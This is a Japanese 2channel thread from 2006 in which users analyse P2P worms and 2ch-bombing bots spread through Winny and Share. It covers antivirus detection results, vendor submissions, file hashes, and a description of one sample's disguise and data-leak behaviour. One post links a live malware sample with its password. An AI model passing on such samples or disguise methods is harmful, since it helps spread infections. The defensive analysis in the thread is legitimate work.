463 :[名無し]さん(bin+cue).rar:2006/04/07(金) 10:21:32 ID:x+e2Ea8R0
>>458
うほっ、VB

464 :[名無し]さん(bin+cue).rar:2006/04/07(金) 11:41:14 ID:k8SbUjE70
>>460
>>460
>>460

465 :[名無し]さん(bin+cue).rar:2006/04/07(金) 13:30:13 ID:7t/IAz2z0
こっちにもぺたぺた
http://qb5.2ch.net/test/read.cgi/sec2chd/1144022103/573

最初の解析↓
まだ続くよ(´・ω・) カワイソス 山田ヲチスレ 221
http://tmp6.2ch.net/test/read.cgi/download/1144070106/558-559

466 :[名無し]さん(bin+cue).rar:2006/04/07(金) 14:43:41 ID:nkGtdPRU0
>入手元は聞かないこと。
なんだかなぁ・・・
とりあえずC:\WINDOWS\System32\ya_wmp.exe -updateってなにダウンロードされるんだろかね。
あと他のとこも弄られてんね。

467 :[名無し]さん(bin+cue).rar:2006/04/07(金) 14:43:56 ID:8zs3htKr0
新種かと思ったら対応されてるのね

468 :[名無し]さん(bin+cue).rar:2006/04/07(金) 15:03:00 ID:7t/IAz2z0
>>466
ウイルスバスター2006では検出しなかったようだ

http://tmp6.2ch.net/test/read.cgi/download/1144070106/565-566

566 名前: [名無し]さん(bin+cue).rar [sage] 投稿日: 2006/04/07(金) 04:32:02 ID:ilSt4fjA0
>>565
ttp://up2.viploader.net/pic/src/viploader134335.jpg
たぶんこれ(´・ω・)ス

469 :[名無し]さん(bin+cue).rar:2006/04/07(金) 15:14:41 ID:+hzDrneu0
>>455のやつだけど

ttp://aboutme.jotti.org/
ここのオンラインスキャンに食わせたら、AVGだけ「 Win32:Mydoom-BJ」と判定したよ('A`)
ノートンAV2005は反応してくれなかった・・・

Win32.Mydoom.BJの説明読んだけど、
ttp://www3.ca.com/securityadvisor/virusinfo/virus.aspx?id=43298
>>455のとはちょっと違うように見えるから、一応ベンダに検体送ってみたよ


470 :[名無し]さん(bin+cue).rar:2006/04/07(金) 15:20:41 ID:+hzDrneu0
連カキごめんね('A`)

別名Win32.Mydoom.BIってことらしいから
そっちも見てみたんだけど
ttp://www.casupport.jp/virusinfo/2005/win32_mydoom_bi.htm

やっぱりちょっと違うっぽい('A`)

471 :[名無し]さん(bin+cue).rar:2006/04/07(金) 16:26:30 ID:NXCl2fUq0
気軽に入手できるようvmware入れようかな・・・

472 :[名無し]さん(bin+cue).rar:2006/04/07(金) 16:31:09 ID:QsPeRtyf0
仮想マシンを無視して本体に感染する類のウイスルもあるから万全ではないよ

473 :[名無し]さん(bin+cue).rar:2006/04/07(金) 16:35:24 ID:iiomjKKx0
安全に使いたいならもう1台PCを購入するのが無難

474 :[名無し]さん(bin+cue).rar:2006/04/07(金) 16:37:16 ID:F01lIvfP0
c:\windows\smss.exeを作成し、ex13.2ch.netへ接続しにいくのを発見したが既出?

475 :[名無し]さん(bin+cue).rar:2006/04/07(金) 16:40:09 ID:n60zmBXV0
ex13ってどこよ
同人?

476 :[名無し]さん(bin+cue).rar:2006/04/07(金) 16:41:55 ID:lG3JbZ0X0
>>474
それは一ヶ月前ぐらいに流行ってた犯罪予告のウイルスじゃないか?
今の爆撃ウイルスの原型のような気もするけど

477 :[名無し]さん(bin+cue).rar:2006/04/07(金) 16:43:41 ID:w51je/xe0
激しく既出じゃねーかゴルァ

478 :[名無し]さん(bin+cue).rar:2006/04/07(金) 16:44:48 ID:w51je/xe0
既出ですた。すんまそん。

479 :[名無し]さん(bin+cue).rar:2006/04/07(金) 16:47:41 ID:oYUQ2OlI0
>>474
とりあえずアンチウイルスの会社には送っておけ。

480 :[名無し]さん(bin+cue).rar:2006/04/07(金) 16:51:02 ID:Trbgvfcm0
>473
できるなら、ルーターのDMZに繋いで更に独自のファイヤーウォールを通して接続とかが望ましい。
安いノートにLinux入れてルーター代わりにして、リスクを分散させてもいいかも。
スキルがある程度ないと、linuxの方がハックされて踏み台にされる危険性があるけどね。

最善の策は、2回線用意してWinnyを繋いだネットワークと、通常使うネットワークは独立させること。
Winnyじゃないけど、鯖を動かしている人にはこういう人もいる。
安全を買おうと思ったら、天井知らずなんだよねー。

481 :[名無し]さん(bin+cue).rar:2006/04/07(金) 16:54:03 ID:w51je/xe0
あれ、もしかしたら未出の亜種かな?
>>475
ex13.2ch.netってのは覚えてるんだが巻き戻しちまったのでlog消えて正確にはわからん。
http://www.google.co.jp/search?hl=ja&lr=lang_ja&q=site:ex13.2ch.net

482 :[名無し]さん(bin+cue).rar:2006/04/07(金) 17:07:39 ID:nkGtdPRU0
>>481
余裕があれば
http://www.vipper.net/
ここにでも挙げてくれ。ハッシュでもいいけど。一応参照してみるから。

483 :[名無し]さん(bin+cue).rar:2006/04/07(金) 17:18:53 ID:he7QJ+z20
kakikomi.txtをうpするウイルスまだ?
広まったらえらいことになるよね

484 :[名無し]さん(bin+cue).rar:2006/04/07(金) 17:34:59 ID:YAHyaM3A0
仁義で実装済み

485 :[名無し]さん(bin+cue).rar:2006/04/07(金) 17:48:55 ID:7djsP71V0
>>472
へー
そうなんだ。。。

486 :[名無し]さん(bin+cue).rar:2006/04/07(金) 17:55:25 ID:i46dnE3L0
>>480
同一回線にすると、どんな風に悪さされるの?

487 :[名無し]さん(bin+cue).rar:2006/04/07(金) 17:55:32 ID:4dM2q3tU0
>>469
うちのノートンは反応したよ。
4/3以前のウィルスパターンだろ。

488 :[名無し]さん(bin+cue).rar:2006/04/07(金) 18:02:04 ID:T1fdDkvR0
ny用に中古でノートパソコンでも買おうかな・・・

nyとちょっとした割れソフト動かす程度なら
Win2000がぎりぎり動くスペックでいいんだよな・・

489 :[名無し]さん(bin+cue).rar:2006/04/07(金) 18:04:49 ID:T0bSE1Qd0
ttp://www.store-mix.com/ko-bai/product.php?pid=399679&oid=9288&hid=o9288p434687a41815
nyだけならSatellite1800 SA70C/4(Celeronプロセッサ700MHz、メモリ128MB)で十分だろ
30000万ぐらいで買える。


490 :[名無し]さん(bin+cue).rar:2006/04/07(金) 18:07:14 ID:6WsEC9Kt0
すごい値段だな

491 :[名無し]さん(bin+cue).rar:2006/04/07(金) 18:09:29 ID:hZ4S02gy0
なぜVMを使わん?

492 :[名無し]さん(bin+cue).rar:2006/04/07(金) 18:11:45 ID:hZ4S02gy0
>>472
 それは、一体どこの情報?

493 :[名無し]さん(bin+cue).rar:2006/04/07(金) 18:11:51 ID:+hzDrneu0
>>487
いや、ウイルス定義 06/04/06 ってなってる・・・


494 :[名無し]さん(bin+cue).rar:2006/04/07(金) 18:24:20 ID:7t/IAz2z0
>メモリ128MB
足りない

最低限256MBは必要 @windows2000

495 :[名無し]さん(bin+cue).rar:2006/04/07(金) 18:28:15 ID:ddSJdYEW0
http://tmp6.2ch.net/test/read.cgi/download/1139439073/
ここで犯行予告してる香具師BOTかな?

496 :[名無し]さん(bin+cue).rar:2006/04/07(金) 18:49:30 ID:lG3JbZ0X0
>>492
もしかしたらこれのことかも。古いバージョンなら注意
ttp://www.itmedia.co.jp/enterprise/articles/0512/22/news046.html


497 :[名無し]さん(bin+cue).rar:2006/04/07(金) 19:29:12 ID:dE394r/i0
>>474
smss.exeなら山田幸に偽装されてうpされたやつじゃないかな?

498 :[名無し]さん(bin+cue).rar:2006/04/07(金) 19:45:09 ID:n60zmBXV0
亜種かもしれないじゃん

499 :[名無し]さん(bin+cue).rar:2006/04/07(金) 19:46:31 ID:+hzDrneu0
>>493す('A`)
http://tmp6.2ch.net/test/read.cgi/download/1144070106/655
ということのようでした
通常のLiveUpdateだとまだ来てくれないみたい

500 :[名無し]さん(bin+cue).rar:2006/04/07(金) 19:55:17 ID:KG0+TY1x0
>>499
ftp://ftp.symantec.com/public/english_us_canada/antivirus_definitions/norton_antivirus/rapidrelease/
を、詳細表示で開いておいて、
symrapidreleasedefsx86.exeまたはsymrapidreleasedefsi32.exeをみてるといいよ〜

ひとつ上の階層の、Intelligent Updater用のより新しいのが入ってたら、げっとだw

501 :[名無し]さん(bin+cue).rar:2006/04/07(金) 20:08:44 ID:+hzDrneu0
>>500
アリガトウ('A`)ノ
あのに:めあどで採りに行きました

502 :[名無し]さん(bin+cue).rar:2006/04/07(金) 20:15:54 ID:+hzDrneu0
ホント連カキごめんなさい
検体送ったSymantecから16:50に返信きてた('A`)よゆうでspamフォルダに入ってた・・・

> filename: ya_wmp.exe
> machine: Machine
> result: This file is detected as W32.HLLW.Antinny.
> http://www.symantec.com/avcenter/venc/data/w32.hllw.antinny.html
-snip-
> Virus definition detail:
>
> Sequence Number:52997
> Defs Version:80407a
> Extended Version:04/07/2006 rev.1

FTP重かったけどマメにチェックしにいきます('A`)

503 :[名無し]さん(bin+cue).rar:2006/04/07(金) 20:28:13 ID:lG3JbZ0X0
>>502
そんなあなたにプレゼント
NAVDefUpdateService
ttp://www.vector.co.jp/soft/winnt/util/se327620.html

504 :[名無し]さん(bin+cue).rar:2006/04/07(金) 20:36:25 ID:KG0+TY1x0
>>503
それよりさらに新しいのが>>500にある場合があるよ

505 :[名無し]さん(bin+cue).rar:2006/04/07(金) 20:39:10 ID:+hzDrneu0
>>503
アリガトウ('A`)ノ
さっそく入れてみたよ これで乗り遅れなくてすむぜ('A`)

506 :[名無し]さん(bin+cue).rar:2006/04/07(金) 21:53:05 ID:KG0+TY1x0
4/7 21:51現在
Intelligent Update 4/6 09:01
rapidrelease 4/7 05:32

ほぼ1日違うね

507 :[名無し]さん(bin+cue).rar:2006/04/07(金) 23:04:23 ID:KG0+TY1x0
rapidrelease 4/7 06:45
新しいの来た

508 :[名無し]さん(bin+cue).rar:2006/04/07(金) 23:46:02 ID:+hzDrneu0
>>507
来てますね('A`)
FTP軽いと思ったらあっちは早朝なのか・・・

509 :[名無し]さん(bin+cue).rar:2006/04/07(金) 23:52:42 ID:7t/IAz2z0
>>508
>FTP軽い
重いときは
運悪くヨーロッパのftpに繋がったんじゃないの?

日本にあるftpに繋げばものすごく軽いよ

510 :[名無し]さん(bin+cue).rar:2006/04/07(金) 23:55:17 ID:eEhWE+7u0
http://qb5.2ch.net/test/read.cgi/sec2chd/1144136159/
ここでウイルスに感染かつWinny使用中の香具師が晒されはじめてるなw

511 :[名無し]さん(bin+cue).rar:2006/04/08(土) 00:24:03 ID:oXNM8POO0
http://qb5.2ch.net/test/read.cgi/sec2chd/1144136159/118-120
>ゾンビPC推定で1000台以上は分散してるんじゃないかと思われます。

_| ̄|○

512 :[名無し]さん(bin+cue).rar:2006/04/08(土) 00:28:53 ID:DS9+9uxq0
何の気なしにMX起動してみたら
キンタマがいっぱい転がってた・・・

>>509
そうかもしれない
前のレスのとき繋ぎにいったらすごく重かったよ('A`)



513 :[名無し]さん(bin+cue).rar:2006/04/08(土) 00:45:24 ID:ACY/+eQ40
>>502
ウィルスパターンじゃなくてノートンを再インストールしろよ。
シマンテックが送ってきたURLをきちんと見てないだろ。
http://www.symantec.com/avcenter/venc/data/w32.hllw.antinny.html

Discovered on: August 08, 2003
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Last Updated on: March 23, 2006 10:18:22 AM
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

514 :[名無し]さん(bin+cue).rar:2006/04/08(土) 01:25:52 ID:DS9+9uxq0
>>513
え、そうなのか

You should download the definitions from the Symantec Security Response Web site
and manually install them.

ってあるから定義ファイル落として入れてた('A`)

515 :[名無し]さん(bin+cue).rar:2006/04/08(土) 01:56:12 ID:oXNM8POO0
http://tmp6.2ch.net/test/read.cgi/download/1144070106/708

今度は、share狙いのキンタマ?

516 :[名無し]さん(bin+cue).rar:2006/04/08(土) 02:06:44 ID:36cEfHk+0
>>460のカキコって何?
あれをブラウザで見るとウイルスに感染したりするの?


517 :[名無し]さん(bin+cue).rar:2006/04/08(土) 02:08:44 ID:BT0/HTaZ0
>>516
対策してないとノートンが反応するだけなんで放っておいてください

518 :[名無し]さん(bin+cue).rar:2006/04/08(土) 02:08:52 ID:+QAP0pnH0
>>516

アンチウィルスソフトが、vbsを使ったマルウェアだと判定して誤作動するだけで
感染はしない

・・・ということは、おまえはアンチウィルスソフトを入れてないのか?


519 :[名無し]さん(bin+cue).rar:2006/04/08(土) 02:09:13 ID:BT0/HTaZ0
補足
誤反応ですから

520 :516:2006/04/08(土) 02:15:49 ID:36cEfHk+0
いや、ノートン先生ご在住なんだけど無反応だよ?



521 :[名無し]さん(bin+cue).rar:2006/04/08(土) 02:38:15 ID:bBPJcYgy0
なんでみんな自分にレスしてるのかと思ったら・・・
あぼーん出てたのか(´・ω・`)

522 :[名無し]さん(bin+cue).rar:2006/04/08(土) 02:42:03 ID:fgIaI6NO0
>>518
いまだにこういう馬鹿がいるんだなぁ

523 :[名無し]さん(bin+cue).rar:2006/04/08(土) 02:42:54 ID:eWykL+3x0
はいはいワロスワロス

524 :ZV216218.ppp.dion.ne.jp:2006/04/08(土) 05:20:27 ID:D6zl27nc0
じぃといっしょにたたかう!!!!!

525 :[名無し]さん(bin+cue).rar:2006/04/08(土) 11:08:28 ID:6Mj+gFH20
一人のキチガイウイルス作者にここまで日本が振り回されるとは
でも俺は作者の心当たりがある

526 :[名無し]さん(bin+cue).rar:2006/04/08(土) 11:33:54 ID:tKU4Nduf0
なぜ、作者が一人だと分かるのかを聞きたいんだが

527 :[名無し]さん(bin+cue).rar:2006/04/08(土) 12:41:41 ID:5/rJ4SFg0
それは秘密です

528 :[名無し]さん(bin+cue).rar:2006/04/08(土) 13:03:12 ID:FQPk1yDJ0
スナドリネコさんキタコレ

529 :[名無し]さん(bin+cue).rar:2006/04/08(土) 13:22:41 ID:vg/WBmN60
>>526
自家製だから

530 :[名無し]さん(bin+cue).rar:2006/04/08(土) 13:39:37 ID:fCC6uY8e0
きっとネットエージェントがうちの技術はホラじゃないと証明する
為に作者のIPを警察に連絡してくれるよ。w

531 :[名無し]さん(bin+cue).rar:2006/04/08(土) 16:33:03 ID:sjZIbRs00
>>526
グループ組んで作ってたら、相当いやなグループだな

532 :[名無し]さん(bin+cue).rar:2006/04/08(土) 17:37:20 ID:oXNM8POO0
http://qb5.2ch.net/test/read.cgi/sec2chd/1144136159/133

命令規則がわかったら、鯖飛びそう

533 :[名無し]さん(bin+cue).rar:2006/04/08(土) 17:43:11 ID:4XoSIdYM0
>>513
いや、ウィルス名は従来からあるのだけど、
ya_wmp.exeのやつは、4/7対応だよ。それまでは対応してない。
新しい名前を付けなかっただけだね。

534 :[名無し]さん(bin+cue).rar:2006/04/08(土) 18:52:35 ID:CRFeh6VK0
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ%5FDELF%2EAXE&VSect=T

535 :[名無し]さん(bin+cue).rar:2006/04/08(土) 21:01:07 ID:Quxk+fDM0
しかしマジこんなお笑い国家他にねーなwwwwwwwいい時代に生まれたもんだwwwwwwwwwwww

536 :[名無し]さん(bin+cue).rar:2006/04/08(土) 21:35:55 ID:vGnpPMjK0
>>534
こりゃー作者は相当のメンヘラーだな、やっぱ
banananくらいしか心当たりない

537 :[名無し]さん(bin+cue).rar:2006/04/08(土) 21:36:16 ID:DOkbKSmv0
ウイルス作成者は捕まったりしないんだろうなぁ

538 :[名無し]さん(bin+cue).rar:2006/04/08(土) 21:48:33 ID:MUutQBUG0
>>534
作者はおっさんだね

539 :[名無し]さん(bin+cue).rar:2006/04/08(土) 21:58:30 ID:BT0/HTaZ0
あー
蟹工船って書き込まれるのはこれだったのね
ありがとう、勉強になった

540 :[名無し]さん(bin+cue).rar:2006/04/08(土) 22:03:45 ID:SN4HKDT+0
蟹工船は前から書き込みあっただろ。。

541 :[名無し]さん(bin+cue).rar:2006/04/08(土) 22:24:11 ID:CRFeh6VK0
アーシェス知ってる時点で40-50代熟練エンジニアはないだろうな。
もっこりが新宿の種馬を指しているならもちっと絞り込めそうな気がしないでもないけど

542 :[名無し]さん(bin+cue).rar:2006/04/08(土) 22:36:11 ID:px1GlA020
>>534
# 解析お疲れ様です
# このプログラムは2ちゃんねるDown板を活性化させるため下層に下がっている
# スレッドを上げるために開発されました。
# Down板の皆様がこのプログラムによりたくさんの幸せを得ることが出来ますよう
# に思考したつもりであります。
# 開発者:安田美沙子大好きモッコリ大臣TYC

この作者意外と知能低いかも
捕まっても知らんぞ

543 :[名無し]さん(bin+cue).rar:2006/04/08(土) 22:56:25 ID:jkYEVnLY0
さあはやくイオナズンの解析に戻るんだ

544 :[名無し]さん(bin+cue).rar:2006/04/08(土) 22:58:40 ID:DS9+9uxq0
ttp://www.symantec.com/region/jp/avcenter/venc/data/jp-trojan.sufiage.html

ボカシ処理されると却って微妙
しかしトレンドマイクロは堂々としておるな

545 :[名無し]さん(bin+cue).rar:2006/04/08(土) 23:04:37 ID:BT0/HTaZ0
豊丸→○丸

何を隠したかったんだろうね

546 :[名無し]さん(bin+cue).rar:2006/04/08(土) 23:05:59 ID:MUutQBUG0
>>544
豊丸ワロスwwwwwwwwwwwww

547 :[名無し]さん(bin+cue).rar:2006/04/08(土) 23:11:13 ID:vGnpPMjK0
確実に20代
大学で孤立組

548 :[名無し]さん(bin+cue).rar:2006/04/08(土) 23:45:03 ID:6HHfG25Z0
>>543
イオナズンはなんか面白い展開になってるぞ
http://qb5.2ch.net/test/read.cgi/sec2chd/1144136159/

549 :[名無し]さん(bin+cue).rar:2006/04/09(日) 00:03:49 ID:566XAGn+0
【春雷】 イオナズン対策スレッド
http://qb5.2ch.net/test/read.cgi/sec2chd/1144136159/

イオナズン直撃キタ━━━ヽ(∀゚ )人(゚∀゚)人( ゚∀)人(∀゚ )人(゚∀゚)人( ゚∀)ノ━━━ !!!

550 :[名無し]さん(bin+cue).rar:2006/04/09(日) 00:04:57 ID:566XAGn+0
補足

【春雷】 イオナズン対策スレッド
http://qb5.2ch.net/test/read.cgi/sec2chd/1144136159/

ここでイオナズンの解析が急展開

そこに作者?が「人の心に悪がある限り、私は蘇る!!」と
意味深なメッセージでイオナズン爆撃

551 :[名無し]さん(bin+cue).rar:2006/04/09(日) 00:07:57 ID:u3KT2UQE0
ワロタ

552 :[名無し]さん(bin+cue).rar:2006/04/09(日) 00:12:39 ID:0aR5CBhX0
よく考えるもんだが、ここまで2ちゃんのことを知り尽くしてウイルス作れる人間は限られてくる。
これまで何度となく2ちゃんねるを荒らしていたからこそできること。

553 :[名無し]さん(bin+cue).rar:2006/04/09(日) 00:18:50 ID:KNF1wDDa0
>>548-550
改悪版の配布を始めたから捨てに入ったとも考えられるな

554 :[名無し]さん(bin+cue).rar:2006/04/09(日) 00:28:13 ID:0aR5CBhX0
やっぱり作者は関連スレ常に監視してたなw 現場に戻る放火犯かよw

555 :[名無し]さん(bin+cue).rar:2006/04/09(日) 00:44:15 ID:Be4Lkqrf0
(・∀・)ニヤニヤしてんのさ

556 :[名無し]さん(bin+cue).rar:2006/04/09(日) 01:08:08 ID:rlChtRUD0
>>534
おい!?オレ様の自演が入ってるぞwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
ワロス

557 :[名無し]さん(bin+cue).rar:2006/04/09(日) 02:02:58 ID:F3d7iWEc0
http://qb5.2ch.net/test/read.cgi/sec2chd/1144508679/81
http://qb5.2ch.net/test/read.cgi/sec2chd/1144508679/96
http://qb5.2ch.net/test/read.cgi/sec2chd/1144508679/109

しかし・・・イオナズン早いな。



558 :[名無し]さん(bin+cue).rar:2006/04/09(日) 02:42:56 ID:I/sATNFn0
>>531
むしろ、オリジナルなき模倣者の群れが…

すいません、攻殻見てました。吊ってきます。

559 :星方天使天環 ◆W/UhU0N3pg :2006/04/09(日) 03:44:44 ID:GvCTq8id0
某ファイル
2006/04/01 18:06 284,672 オレンジレンジ.scr
UPXで圧縮されてる
言語:Delphi

自分自身を
倖田來未, セックス, エロ, 新しいフォルダ, ハメ撮り, 結婚式, 出産, ネトゲ, 株取引, オレンジレンジ
のどれかとして流出ファイルにぶち込む

ex)オレンジレンジ.scr

流出するファイル名は
[殺人] <PCのユーザー名>(<yyyymmdd-hhnnss形式の日時>)のキンタマ.zip

[写真集][IV] <PCのユーザー名>(<yyyymmdd-hhnnss形式の日時>)のアルバム.zip

shareとwinnyのアップフォルダを(略 実行しないと分からん

今の所 share にだけ存在

560 :[名無し]さん(bin+cue).rar:2006/04/09(日) 03:47:18 ID:F3d7iWEc0
>>559
乙です。

新種は、これか。

561 :c⌒っミ `Д)っφ ◆CaKkuEV3EI :2006/04/09(日) 04:22:22 ID:+C5YRoDC0 ?
誘導されました。
p2pは門外です。スマソ

562 :[名無し]さん(bin+cue).rar:2006/04/09(日) 04:33:00 ID:n5lIfpk60
(・∀・) カエレ!!

563 :[名無し]さん(bin+cue).rar:2006/04/09(日) 04:33:28 ID:F3d7iWEc0
あれ?こっちで>>559って出てなかったっけ?

【雑談禁止】仁義なきキンタマ ウイルス情報 Part32
http://tmp6.2ch.net/test/read.cgi/download/1144153569/624

一杯あるからどこに貼ったかわからなくなる('A`)


564 :[名無し]さん(bin+cue).rar:2006/04/09(日) 05:09:44 ID:GvCTq8id0
>>563
解析はまだないはず

565 :[名無し]さん(bin+cue).rar:2006/04/09(日) 11:49:25 ID:8T8+enxH0
shareの新作ウィルスは、最初に出回ったの以外犠牲者のファイルが増えないね。
出回ってるやつも落ちてこないの多いし。
なんか不具合があるのかな。

566 :[名無し]さん(bin+cue).rar:2006/04/09(日) 12:09:56 ID:F3d7iWEc0
>>565
村長がバージョンしたせいで、挙動がダメになったとか。

567 :[名無し]さん(bin+cue).rar:2006/04/09(日) 12:18:59 ID:W0OMrAIh0
時限式whiterどか・・・

568 :[名無し]さん(bin+cue).rar:2006/04/09(日) 12:23:59 ID:bNJnCfh/0
もともと洒落はupフォルダに入れるだけで拡散しなくては広まりにくいうえに
クエリで色分けもされるので自分がupしてるのにも気付きやすい

569 :[名無し]さん(bin+cue).rar:2006/04/09(日) 13:21:08 ID:+y9Hv2g80
イオナズンの正体らしいです。
捏造警告お願いしまーす

NoDVDパッチ [18禁ゲーム] 転娘!?〜とにかくよく転ぶドジっ娘たち〜 [060317].zip 195,205 d9839e879f4bd3f64791c8f7f026a144
NoDVDパッチ [18禁ゲーム] お帰りなさいませ☆ご主人様♪ [060317].zip 195,179 0bdcf9554b98cde5ef716743617d9365
NoDVDパッチ [18禁ゲーム] がくと! [060317].zip 195,141 84b08a1b8e28426065fea4abd5f9d8a0
NoDVDパッチ [18禁ゲーム] エロ医 [060317].zip 195,137 1ed0e80fed1b0a0b440744045b500146

570 :[名無し]さん(bin+cue).rar:2006/04/09(日) 13:26:43 ID:F3d7iWEc0
イオナズンBOTまとめサイト
ttp://life.45.kg/sec/#iona

571 :[名無し]さん(bin+cue).rar:2006/04/09(日) 14:05:10 ID:bNJnCfh/0
小泉=節穴age=イオナズンで間違いないな
作りがまるっきり一緒
作者単に遊んでるだけだな

一方腐海の方は作りにかなりの熟練さを感じる
まあエラー処理とかがしっかりしてるぶん穴が多いわけだが

572 :[名無し]さん(bin+cue).rar:2006/04/09(日) 14:28:12 ID:NS76ovRN0
>>569
NoDVDパッチ [18禁ゲーム] エロ医 [060317].zip 195,137 1ed0e80fed1b0a0b440744045b500146
AVG 268.4.0/305 右クリックスキャンで検出。 Trojan horse Generic.SBJ

573 :[名無し]さん(bin+cue).rar:2006/04/09(日) 19:00:49 ID:iO7jgr8G0
イオナズンは単に2ch攻撃するだけで感染者の実害は大してないでFA?

574 :[名無し]さん(bin+cue).rar:2006/04/09(日) 19:09:58 ID:+y9Hv2g80
2chに書けなくなる
今焼き焼きしてるらしいからね

575 :[名無し]さん(bin+cue).rar:2006/04/09(日) 19:13:26 ID:0aR5CBhX0
個人情報暴露でもマスゴミが騒いでくれなくなったから
2ちゃんねるを騒がせることに変更したか

576 :[名無し]さん(bin+cue).rar:2006/04/09(日) 19:31:09 ID:S0sEplAB0
2ちゃんねるに書き込めなくウイルスは俺にとっては深刻な被害だな(苦笑

577 :[名無し]さん(bin+cue).rar:2006/04/09(日) 19:36:26 ID:/rsG7uqo0
AVソフトのうちの数社がウィルスとしては認めなかったので
(スパム扱いで対応外と判断された)ウィルスを広め易いと判断したのかも。

578 :[名無し]さん(bin+cue).rar:2006/04/09(日) 19:36:42 ID:GJYFq+iS0
そうだな(嘲笑

579 :[名無し]さん(bin+cue).rar:2006/04/09(日) 19:37:15 ID:GJYFq+iS0
げー割り込まれた orz

580 :[名無し]さん(bin+cue).rar:2006/04/09(日) 19:38:56 ID:aSUeEG7o0
そうだな(嘲笑

581 :[名無し]さん(bin+cue).rar:2006/04/09(日) 19:42:53 ID:S0sEplAB0
>>577
なるほどね
認定するアンチウイルスソフトに乗り換えようかしら

582 :[名無し]さん(bin+cue).rar:2006/04/09(日) 21:05:43 ID:Exo0IDyH0
そのうちp2もウイルスになるね^^

583 :[名無し]さん(bin+cue).rar:2006/04/09(日) 21:19:12 ID:zEp8xv2I0
>>579
グッジョブ

584 :[名無し]さん(bin+cue).rar:2006/04/09(日) 21:56:42 ID:F10P9m8K0
成年コミック) [雑誌] comic lo 2006年05月号(vol.26) .exe
なるファイルを発見・・・

Norton先生では認識されない。実行してないから症状はわからないけどけどなんかの亜種?

キャッシュと元ファイルを削除したあとでにちゃんねるで相談することを思い立って
この板に来たんだが・・・ウイルス(?)本体は保存してあるので必要だったら言ってくれ。

585 :[名無し]さん(bin+cue).rar:2006/04/09(日) 22:25:41 ID:lhE2Md5j0
>>584
焼きスレの方に提出してくれ

586 :[名無し]さん(bin+cue).rar:2006/04/09(日) 22:33:19 ID:F10P9m8K0
>>585
了解。おさわがせしますた。

587 :[名無し]さん(bin+cue).rar:2006/04/09(日) 22:46:47 ID:F10P9m8K0
■ウィルス爆撃相談所&焼き処2【RockBBQ】
http://qb5.2ch.net/test/read.cgi/sec2chd/1144022103/

えーと、ここでいいのかな?
なんか違うような気がするんだけど。

588 :[名無し]さん(bin+cue).rar:2006/04/09(日) 22:48:11 ID:UHLNaIGX0
そこでいいんじゃないの
違ったら誘導されるだろうし

589 :[名無し]さん(bin+cue).rar:2006/04/09(日) 23:42:32 ID:KNF1wDDa0
なんかすごいたらい回しを見た気がする

590 :[名無し]さん(bin+cue).rar:2006/04/09(日) 23:49:04 ID:aP9My7n60
>>585
もまえさては役所の人間だろw

591 :[名無し]さん(bin+cue).rar:2006/04/09(日) 23:49:38 ID:bNJnCfh/0
ごめん、最後ここに誘導したの俺w
てかだいぶ前にも関わらずそれの書き込み見ないから未完成なんじゃねの

592 :[名無し]さん(bin+cue).rar:2006/04/10(月) 00:00:38 ID:Oj87aEve0
ダウソでなくニュース議論板を狙うらしい亜種も流れてる。
シマンテックに送付済み。

593 :[名無し]さん(bin+cue).rar:2006/04/10(月) 00:07:19 ID:MBgh39nF0
検体拾えなかったorz
ttp://up.rising.com.cn/
だれかここにもおねがい(´・ω・) ス

594 :[名無し]さん(bin+cue).rar:2006/04/10(月) 00:19:10 ID:Oj87aEve0
>>593 読めないーー。

ニュース議論板を狙うっぽい亜種あぷしました
ttp://kasamatusan.sakura.ne.jp/cgi-bin2/src/ichi31073.zip.html
pass:rvrv

595 :[名無し]さん(bin+cue).rar:2006/04/10(月) 00:38:52 ID:/W6bcGlj0
>>593
>>594

すまんそん
イオナズン対策スレの方で反応あったのでうぷろだの
ファイルは削除しますた。

ttp://qb5.2ch.net/test/read.cgi/sec2chd/1144519139/464-477

必要ならもう一度上げるけど・・・

596 :[名無し]さん(bin+cue).rar:2006/04/10(月) 00:51:41 ID:JHxQcXUH0
>>594
いただきました。dク(´・ω・) ス

597 :594:2006/04/10(月) 00:52:04 ID:Oj87aEve0
>>595 ありがとう。私は必要ないです〜。そっちも落ちてきました。

ダウソ狙うほうはこれかな。バイナリ中の文字列、“%d#byoudou”からトリップで
手持ちログを検索しました。

ここを監視している警察に言いたいことを書くスレ13
http://tmp6.2ch.net/test/read.cgi/download/1139439073/431,522,523,529,546,552,563,564,569,590,592,594,623,627

スレタイのキーワードで狙うのかな。
数千人の死者、犯行声明、法律、罰、罪、犯行予告、警察、あたりが怪しい?


598 :[名無し]さん(bin+cue).rar:2006/04/10(月) 01:01:17 ID:Oj87aEve0
>>596 はいー。そろそろアプロダから消します〜。

ニュース議論板のほうは、数千人の死者、犯行声明、法律、不平等、犯行予告、小泉、
がキーワード?

小泉は、やることなすこと米国ユダヤ様のご命令通り。お犬様六匹目
http://news18.2ch.net/test/read.cgi/news2/1142718937/927,964,966

【また小泉の先送りか】民主党提出の議員年金廃止法案は廃案
http://news18.2ch.net/test/read.cgi/news2/1130933855/123


599 :[名無し]さん(bin+cue).rar:2006/04/10(月) 01:01:41 ID:8UtU4gDK0
発動してたのか。やっぱ人工無能付きですな
そこそこ会話になってるのワロス

600 :[名無し]さん(bin+cue).rar:2006/04/10(月) 01:07:42 ID:JAgydFbV0
これはまさに乙だな。
いい仕事してます。

601 :594:2006/04/10(月) 01:10:01 ID:Oj87aEve0
アプロダから消しましたー。

602 :[名無し]さん(bin+cue).rar:2006/04/10(月) 01:24:53 ID:6Z7xjjc/0
ぐはぁ、落とせなかったorz

603 :[名無し]さん(bin+cue).rar:2006/04/10(月) 04:55:14 ID:hnR4/reG0
うぃるすが入っていそうなファイルをDL中

本物は
(成年コミック) [雑誌] COMIC LO 2006年05月号(Vol.26).zip 84Xr73KYyK 92,763,459 f69a1c763cca98f5dacc0602fccd6c41
なんだけど
サイズがちょっと大きいのはウィルス入りの可能性有

84Xr73KYyK のトリップがあれば安全らしい

604 :[名無し]さん(bin+cue).rar:2006/04/10(月) 06:09:49 ID:+8yWZYC40
http://news18.2ch.net/test/read.cgi/news2/1142718937/973-
怪しいな

605 :[名無し]さん(bin+cue).rar:2006/04/10(月) 08:18:56 ID:hnR4/reG0
>>604
さんくす

